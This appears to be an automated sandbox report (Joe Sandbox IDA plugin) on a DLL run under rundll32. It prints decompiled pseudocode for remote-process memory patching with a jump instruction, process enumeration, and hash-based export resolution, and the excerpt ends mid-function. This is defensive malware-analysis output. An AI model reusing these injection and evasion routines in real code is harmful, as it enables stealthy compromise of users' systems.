                                                                                                                                                                                                                0x1000b2d3
                                                                                                                                                                                                                0x1000b2d3
                                                                                                                                                                                                                0x1000b2f2
                                                                                                                                                                                                                0x1000b2f8
                                                                                                                                                                                                                0x1000b2fd
                                                                                                                                                                                                                0x1000b303
                                                                                                                                                                                                                0x1000b308
                                                                                                                                                                                                                0x1000b30e
                                                                                                                                                                                                                0x1000b30e
                                                                                                                                                                                                                0x1000b317
                                                                                                                                                                                                                0x1000b31d
                                                                                                                                                                                                                0x1000b321
                                                                                                                                                                                                                0x1000b328
                                                                                                                                                                                                                0x1000b32f
                                                                                                                                                                                                                0x1000b336
                                                                                                                                                                                                                0x1000b33a
                                                                                                                                                                                                                0x1000b341
                                                                                                                                                                                                                0x1000b342
                                                                                                                                                                                                                0x1000b344
                                                                                                                                                                                                                0x1000b349
                                                                                                                                                                                                                0x1000b350
                                                                                                                                                                                                                0x1000b352
                                                                                                                                                                                                                0x1000b352
                                                                                                                                                                                                                0x1000b358
                                                                                                                                                                                                                0x1000b362
                                                                                                                                                                                                                0x1000b367
                                                                                                                                                                                                                0x1000b367
                                                                                                                                                                                                                0x1000b379
                                                                                                                                                                                                                0x1000b37f
                                                                                                                                                                                                                0x1000b38c
                                                                                                                                                                                                                0x1000b381
                                                                                                                                                                                                                0x1000b383
                                                                                                                                                                                                                0x1000b383
                                                                                                                                                                                                                0x1000b391
                                                                                                                                                                                                                0x1000b396
                                                                                                                                                                                                                0x1000b39c
                                                                                                                                                                                                                0x1000b39e
                                                                                                                                                                                                                0x1000b3a7
                                                                                                                                                                                                                0x1000b3a7
                                                                                                                                                                                                                0x1000b3af
                                                                                                                                                                                                                0x1000b3b4
                                                                                                                                                                                                                0x1000b3b4
                                                                                                                                                                                                                0x1000b3ba
                                                                                                                                                                                                                0x1000b3c5
                                                                                                                                                                                                                0x1000b3ca
                                                                                                                                                                                                                0x1000b3d2
                                                                                                                                                                                                                0x1000b3d8
                                                                                                                                                                                                                0x1000b3e0
                                                                                                                                                                                                                0x1000b3f2
                                                                                                                                                                                                                0x1000b3f8
                                                                                                                                                                                                                0x1000b400
                                                                                                                                                                                                                0x1000b405
                                                                                                                                                                                                                0x1000b412
                                                                                                                                                                                                                0x1000b423
                                                                                                                                                                                                                0x1000b429
                                                                                                                                                                                                                0x1000b42e
                                                                                                                                                                                                                0x1000b431
                                                                                                                                                                                                                0x1000b434
                                                                                                                                                                                                                0x1000b441
                                                                                                                                                                                                                0x1000b447
                                                                                                                                                                                                                0x1000b451
                                                                                                                                                                                                                0x1000b451
                                                                                                                                                                                                                0x1000b457
                                                                                                                                                                                                                0x1000b45f
                                                                                                                                                                                                                0x1000b46a
                                                                                                                                                                                                                0x1000b46f
                                                                                                                                                                                                                0x1000b475
                                                                                                                                                                                                                0x1000b477
                                                                                                                                                                                                                0x1000b484
                                                                                                                                                                                                                0x1000b485
                                                                                                                                                                                                                0x1000b486
                                                                                                                                                                                                                0x1000b491
                                                                                                                                                                                                                0x1000b493
                                                                                                                                                                                                                0x1000b49a
                                                                                                                                                                                                                0x1000b49a
                                                                                                                                                                                                                0x1000b4a4
                                                                                                                                                                                                                0x1000b4a9
                                                                                                                                                                                                                0x1000b4ae
                                                                                                                                                                                                                0x1000b4ae
                                                                                                                                                                                                                0x1000b4b4
                                                                                                                                                                                                                0x1000b4bb
                                                                                                                                                                                                                0x1000b4bc
                                                                                                                                                                                                                0x1000b4c9
                                                                                                                                                                                                                0x1000b4dc
                                                                                                                                                                                                                0x1000b4e1
                                                                                                                                                                                                                0x1000b4e6
                                                                                                                                                                                                                0x1000b4ef
                                                                                                                                                                                                                0x1000b4ef
                                                                                                                                                                                                                0x1000b4f5
                                                                                                                                                                                                                0x1000b4fa
                                                                                                                                                                                                                0x1000b500
                                                                                                                                                                                                                0x1000b506
                                                                                                                                                                                                                0x1000b50b
                                                                                                                                                                                                                0x1000b514
                                                                                                                                                                                                                0x1000b516
                                                                                                                                                                                                                0x1000b51d
                                                                                                                                                                                                                0x1000b51d
                                                                                                                                                                                                                0x1000b523
                                                                                                                                                                                                                0x1000b52b
                                                                                                                                                                                                                0x1000b530
                                                                                                                                                                                                                0x1000b531
                                                                                                                                                                                                                0x1000b536
                                                                                                                                                                                                                0x1000b53f
                                                                                                                                                                                                                0x1000b541
                                                                                                                                                                                                                0x1000b54c
                                                                                                                                                                                                                0x1000b54c
                                                                                                                                                                                                                0x1000b555
                                                                                                                                                                                                                0x1000b55d
                                                                                                                                                                                                                0x1000b564
                                                                                                                                                                                                                0x1000b569
                                                                                                                                                                                                                0x1000b578
                                                                                                                                                                                                                0x1000b590
                                                                                                                                                                                                                0x1000b597
                                                                                                                                                                                                                0x1000b5a5
                                                                                                                                                                                                                0x1000b5b0
                                                                                                                                                                                                                0x1000b5b1
                                                                                                                                                                                                                0x1000b5b5
                                                                                                                                                                                                                0x1000b5bb
                                                                                                                                                                                                                0x1000b5bc
                                                                                                                                                                                                                0x1000b5c4
                                                                                                                                                                                                                0x1000b5c9
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000b5d1
                                                                                                                                                                                                                0x1000b5d5

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 10009525: RtlAllocateHeap.NTDLL(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,00000001), ref: 1000B258
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000001), ref: 1000B352
                                                                                                                                                                                                                • GetVersionExA.KERNEL32(00000000,?,?,00000001), ref: 1000B434
                                                                                                                                                                                                                  • Part of subcall function 1000E550: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000E5F4
                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00001020,00000104,?,?,00000001), ref: 1000B45F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastNotificationProcessVersionWindows
                                                                                                                                                                                                                • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                                                • API String ID: 1354322220-2706916422
                                                                                                                                                                                                                • Opcode ID: c3f59ee73e5be98a47a9f9a7ffb566f7efe146b61a4d604da622eee37d8853a8
                                                                                                                                                                                                                • Instruction ID: 9ecf3e02f1acfa31b532110abafa1360833cb570ef2274f9fa1bd2246b0adb1a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3f59ee73e5be98a47a9f9a7ffb566f7efe146b61a4d604da622eee37d8853a8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAA18E35701A16AFE704EFB4CC89BEAB7A9FF48340F100169F519D7252EB30BA458B91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 226 1000aa02-1000aa26 227 1000aa45 call 1000a2bd 226->227 228 1000aa28-1000aa2d 226->228 232 1000aa4a 227->232 228->227 229 1000aa2f-1000aa32 228->229 229->227 231 1000aa34-1000aa38 229->231 234 1000aa3a-1000aa3c 231->234 235 1000aa3e-1000aa43 231->235 233 1000aa4f-1000aa51 232->233 236 1000aa53-1000aa58 233->236 237 1000aa69-1000aa77 call 1000a4a8 233->237 234->227 234->235 235->233 238 1000aa5d call 1000a3ec 236->238 237->238 243 1000aa79-1000aab0 call 100096bf Wow64GetThreadContext 237->243 242 1000aa62 238->242 244 1000aa64-1000aa68 242->244 243->238 247 1000aab2-1000aacb 243->247 248 1000aada-1000aade 247->248 249 1000aacd-1000aad8 247->249 251 1000aae0-1000aae5 248->251 252 1000ab53-1000ab55 248->252 250 1000aae6-1000ab06 NtProtectVirtualMemory 249->250 253 1000ab08-1000ab0a 250->253 254 1000ab0f-1000ab2a NtWriteVirtualMemory 250->254 251->250 252->244 253->238 254->253 255 1000ab2c-1000ab4b NtProtectVirtualMemory 254->255 255->238 256 1000ab51 255->256 256->253
                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                			E1000AA02(intOrPtr __ecx, void** __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                				intOrPtr _v15;
                                                                                                                                                                                                                				void _v16;
                                                                                                                                                                                                                				long _v20;
                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                				long _v32;
                                                                                                                                                                                                                				void* _v572;
                                                                                                                                                                                                                				char _v748;
                                                                                                                                                                                                                				signed char _t39;
                                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                				void _t51;
                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                				void** _t69;
                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                                				long _t78;
                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t70 = __ecx;
                                                                                                                                                                                                                				_t69 = __edx;
                                                                                                                                                                                                                				_v28 = __ecx;
                                                                                                                                                                                                                				_t74 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                				_t80 = 0;
                                                                                                                                                                                                                				_t2 = _t74 + 0x1898; // 0x4
                                                                                                                                                                                                                				_t39 =  *_t2;
                                                                                                                                                                                                                				if(_t39 == 0x200 || _t39 == 0x80 || _t39 == 2 ||  *((intOrPtr*)(_t74 + 4)) >= 0xa && (_t39 & 0x00000004) != 0) {
                                                                                                                                                                                                                					_t40 = E1000A2BD(_t70, _t74); // executed
                                                                                                                                                                                                                					 *0x10020e70 = _t40;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t40 =  *0x10020e70; // 0x4751868
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				if(_t40 != 0) {
                                                                                                                                                                                                                					_t41 = E1000A4A8( *_t69, _a4); // executed
                                                                                                                                                                                                                					_t80 = _t41;
                                                                                                                                                                                                                					if(_t80 == 0) {
                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						E100096BF( &_v748, 0, 0x2cc);
                                                                                                                                                                                                                						_v748 = 0x10002;
                                                                                                                                                                                                                						_push( &_v748);
                                                                                                                                                                                                                						_t47 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                						_push(_t69[1]);
                                                                                                                                                                                                                						if( *((intOrPtr*)(_t47 + 0xb8))() == 0) {
                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                							_t51 = _t80 - _a4 + _v28;
                                                                                                                                                                                                                							_t72 = _v572;
                                                                                                                                                                                                                							_t78 = 5;
                                                                                                                                                                                                                							if(_a8 != 1) {
                                                                                                                                                                                                                								if(_a8 != 2) {
                                                                                                                                                                                                                									_t43 = 0;
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									_v16 = _t51;
                                                                                                                                                                                                                									_t78 = 4;
                                                                                                                                                                                                                									goto L17;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								_v16 = 0xe9;
                                                                                                                                                                                                                								_v15 = _t51 - _t72 - _t78;
                                                                                                                                                                                                                								L17:
                                                                                                                                                                                                                								_v8 = _t78;
                                                                                                                                                                                                                								_v24 = _t72;
                                                                                                                                                                                                                								if(NtProtectVirtualMemory( *_t69,  &_v24,  &_v8, 4,  &_v20) >= 0) {
                                                                                                                                                                                                                									if(NtWriteVirtualMemory( *_t69, _v572,  &_v16, _t78,  &_v8) < 0) {
                                                                                                                                                                                                                										goto L18;
                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                										_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                                										if(NtProtectVirtualMemory( *_t69,  &_v24,  &_v8, _v20,  &_v32) >= 0) {
                                                                                                                                                                                                                											goto L9;
                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                											goto L18;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									L18:
                                                                                                                                                                                                                									_t80 = 0;
                                                                                                                                                                                                                									goto L9;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								L23:
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t68 =  *0x10020d94; // 0x474fa48
                                                                                                                                                                                                                					 *0x10020e70 = _t68;
                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                					E1000A3EC();
                                                                                                                                                                                                                					_t43 = _t80;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t43;
                                                                                                                                                                                                                				goto L23;
                                                                                                                                                                                                                			}
























                                                                                                                                                                                                                0x1000aa02
                                                                                                                                                                                                                0x1000aa0c
                                                                                                                                                                                                                0x1000aa0e
                                                                                                                                                                                                                0x1000aa11
                                                                                                                                                                                                                0x1000aa18
                                                                                                                                                                                                                0x1000aa1b
                                                                                                                                                                                                                0x1000aa1b
                                                                                                                                                                                                                0x1000aa26
                                                                                                                                                                                                                0x1000aa45
                                                                                                                                                                                                                0x1000aa4a
                                                                                                                                                                                                                0x1000aa3e
                                                                                                                                                                                                                0x1000aa3e
                                                                                                                                                                                                                0x1000aa3e
                                                                                                                                                                                                                0x1000aa51
                                                                                                                                                                                                                0x1000aa6e
                                                                                                                                                                                                                0x1000aa73
                                                                                                                                                                                                                0x1000aa77
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000aa79
                                                                                                                                                                                                                0x1000aa87
                                                                                                                                                                                                                0x1000aa8f
                                                                                                                                                                                                                0x1000aa9f
                                                                                                                                                                                                                0x1000aaa0
                                                                                                                                                                                                                0x1000aaa5
                                                                                                                                                                                                                0x1000aab0
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000aab2
                                                                                                                                                                                                                0x1000aab2
                                                                                                                                                                                                                0x1000aabb
                                                                                                                                                                                                                0x1000aac2
                                                                                                                                                                                                                0x1000aaca
                                                                                                                                                                                                                0x1000aacb
                                                                                                                                                                                                                0x1000aade
                                                                                                                                                                                                                0x1000ab53
                                                                                                                                                                                                                0x1000aae0
                                                                                                                                                                                                                0x1000aae2
                                                                                                                                                                                                                0x1000aae5
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000aae5
                                                                                                                                                                                                                0x1000aacd
                                                                                                                                                                                                                0x1000aacf
                                                                                                                                                                                                                0x1000aad5
                                                                                                                                                                                                                0x1000aae6
                                                                                                                                                                                                                0x1000aae9
                                                                                                                                                                                                                0x1000aaf2
                                                                                                                                                                                                                0x1000ab06
                                                                                                                                                                                                                0x1000ab2a
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000ab2c
                                                                                                                                                                                                                0x1000ab2c
                                                                                                                                                                                                                0x1000ab4b
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000ab51
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000ab51
                                                                                                                                                                                                                0x1000ab4b
                                                                                                                                                                                                                0x1000ab08
                                                                                                                                                                                                                0x1000ab08
                                                                                                                                                                                                                0x1000ab08
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000ab08
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000ab06
                                                                                                                                                                                                                0x1000aacb
                                                                                                                                                                                                                0x1000aab0
                                                                                                                                                                                                                0x1000aa53
                                                                                                                                                                                                                0x1000aa53
                                                                                                                                                                                                                0x1000aa58
                                                                                                                                                                                                                0x1000aa5d
                                                                                                                                                                                                                0x1000aa5d
                                                                                                                                                                                                                0x1000aa62
                                                                                                                                                                                                                0x1000aa62
                                                                                                                                                                                                                0x1000aa68
                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010002,?,00000000,00000001), ref: 1000AAA8
                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,00000001,00000004,00000000,?,00000000,00000001), ref: 1000AB01
                                                                                                                                                                                                                • NtWriteVirtualMemory.NTDLL(?,?,00000002,00000004,00000001,?,00000000,00000001), ref: 1000AB25
                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,00000001,00000000,00000000,?,00000000,00000001), ref: 1000AB46
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MemoryVirtual$Protect$ContextThreadWow64Write
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1811831458-0
                                                                                                                                                                                                                • Opcode ID: e7f6d40e21079af8cd1ea1dee90f303181879499d9c5e0249dd15e369b9b0682
                                                                                                                                                                                                                • Instruction ID: 8bc5829f845a12ea8b60137831a6806cc275a37a637710cc3731e64fdec36fb8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7f6d40e21079af8cd1ea1dee90f303181879499d9c5e0249dd15e369b9b0682
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2441AC71A00219EFEB50CFA8C988A9EB7FAFF4A380F104265F505E61A5D770DA85CF51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                			E1000CD1E(void* __ecx, void* __edx) {
                                                                                                                                                                                                                				void* _v304;
                                                                                                                                                                                                                				void* _v308;
                                                                                                                                                                                                                				intOrPtr _v312;
                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                				signed int _t17;
                                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t33 = __edx;
                                                                                                                                                                                                                				_v304 = __ecx;
                                                                                                                                                                                                                				_t16 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                				_t45 = _t16;
                                                                                                                                                                                                                				_t17 = _t16 | 0xffffffff;
                                                                                                                                                                                                                				if(_t45 != _t17) {
                                                                                                                                                                                                                					E100096BF( &_v304, 0, 0x128);
                                                                                                                                                                                                                					_v304 = 0x128;
                                                                                                                                                                                                                					if(Process32First(_t45,  &_v304) != 0) {
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							_t43 = _v312( &_v308, _t33);
                                                                                                                                                                                                                						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
                                                                                                                                                                                                                						FindCloseChangeNotification(_t45);
                                                                                                                                                                                                                						_t17 = 0 | _t43 == 0x00000000;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						_t30 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                						 *((intOrPtr*)(_t30 + 0x34))(_t45);
                                                                                                                                                                                                                						_t17 = 0xfffffffe;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t17;
                                                                                                                                                                                                                			}












                                                                                                                                                                                                                0x1000cd36
                                                                                                                                                                                                                0x1000cd38
                                                                                                                                                                                                                0x1000cd3c
                                                                                                                                                                                                                0x1000cd3f
                                                                                                                                                                                                                0x1000cd41
                                                                                                                                                                                                                0x1000cd46
                                                                                                                                                                                                                0x1000cd55
                                                                                                                                                                                                                0x1000cd5d
                                                                                                                                                                                                                0x1000cd71
                                                                                                                                                                                                                0x1000cd81
                                                                                                                                                                                                                0x1000cd8b
                                                                                                                                                                                                                0x1000cd8f
                                                                                                                                                                                                                0x1000cdac
                                                                                                                                                                                                                0x1000cdb3
                                                                                                                                                                                                                0x1000cd73
                                                                                                                                                                                                                0x1000cd73
                                                                                                                                                                                                                0x1000cd79
                                                                                                                                                                                                                0x1000cd7e
                                                                                                                                                                                                                0x1000cd7e
                                                                                                                                                                                                                0x1000cd71
                                                                                                                                                                                                                0x1000cdbc

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000019,?,00000018), ref: 1000CD3C
                                                                                                                                                                                                                  • Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1
                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 1000CD6C
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 1000CD9F
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 1000CDAC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2518216231-0
                                                                                                                                                                                                                • Opcode ID: 996dcc371edf8a3de5ade8aca68dc2e00b0d215e3b0d06ae6d94bc47d4b545c2
                                                                                                                                                                                                                • Instruction ID: e0ff1e4e8235e93eda23a65ce13b7923652eca031fd4941afaeddc76423dec26
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 996dcc371edf8a3de5ade8aca68dc2e00b0d215e3b0d06ae6d94bc47d4b545c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5911C4736053559BE350DFA8DC48E9B7BECEFC53A0F15062AF910C71A1EB20E90687A5
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 289 1000970d-10009724 290 10009781 289->290 291 10009726-1000974e 289->291 293 10009783-10009787 290->293 291->290 292 10009750-10009773 call 1000d389 call 1000eeec 291->292 298 10009775-1000977f 292->298 299 10009788-1000979f 292->299 298->290 298->292 300 100097a1-100097a9 299->300 301 100097f5-100097f7 299->301 300->301 302 100097ab 300->302 301->293 303 100097ad-100097b3 302->303 304 100097c3-100097d4 303->304 305 100097b5-100097b7 303->305 307 100097d6-100097d7 304->307 308 100097d9-100097e5 LoadLibraryA 304->308 305->304 306 100097b9-100097c1 305->306 306->303 306->304 307->308 308->290 309 100097e7-100097f1 GetProcAddress 308->309 309->290 310 100097f3 309->310 310->293
                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E1000970D(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                				signed int _t47;
                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                				struct HINSTANCE__* _t58;
                                                                                                                                                                                                                				_Unknown_base(*)()* _t59;
                                                                                                                                                                                                                				intOrPtr _t60;
                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                				intOrPtr _t63;
                                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                                				char _t70;
                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                				CHAR* _t80;
                                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t75 = __ecx;
                                                                                                                                                                                                                				_v12 = __edx;
                                                                                                                                                                                                                				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                                                                				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                                                                				if(_t41 == 0) {
                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t62 = _t41 + __ecx;
                                                                                                                                                                                                                				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                                                                				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                                                				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                                                                				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                                                                				_t47 = 0;
                                                                                                                                                                                                                				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                				_v16 = _t63;
                                                                                                                                                                                                                				if(_t63 == 0) {
                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					goto L2;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                					_t49 = E1000EEEC( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000D389( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                                                                					_t51 = _v8;
                                                                                                                                                                                                                					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t73 = _v20;
                                                                                                                                                                                                                					_t47 = _t51 + 1;
                                                                                                                                                                                                                					_v8 = _t47;
                                                                                                                                                                                                                					if(_t47 < _v16) {
                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                                                                				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                                                                				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                                                                					return _t80;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t56 = 0;
                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                						_t70 = _t80[_t56];
                                                                                                                                                                                                                						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                                                                						_t56 = _t56 + 1;
                                                                                                                                                                                                                						if(_t56 < 0x40) {
                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
